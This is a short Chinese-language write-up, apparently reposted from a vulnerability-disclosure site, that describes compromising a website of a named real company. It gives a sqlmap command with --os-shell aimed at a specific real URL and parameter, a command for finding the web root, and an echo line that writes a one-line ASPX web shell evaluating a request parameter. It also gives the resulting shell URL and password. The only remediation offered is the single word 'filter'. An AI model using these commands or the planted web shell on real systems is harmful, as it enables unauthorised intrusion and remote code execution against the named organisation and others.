中粮集团有限公司某站从sql注入到getshell
还是得shell啊、0.0求首页 求20
抱歉了、其实时间查询很费事 有时候很想懒省事 效果却不好、
sqlmap.py -u "www.cofco-property.cn/iframe.aspx?id=1*" –dbms="mssql" –os-shell
windows使用dir /s/a-d/b d:*iframe.aspx 可以很方便的寻找路径
然后就是直接写shell了、
echo ^<^%@ Page Language="Jscript" validateRequest="false" %^>^<^%Response.Write(eval(Request.Item["w"],"unsafe"));%^>^ > "d:wwwrootwebuiwhynot.aspx"
https://www.cofco-property.cn/whynot.aspx 密码w
解决方案:
过滤啊。
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/100086.html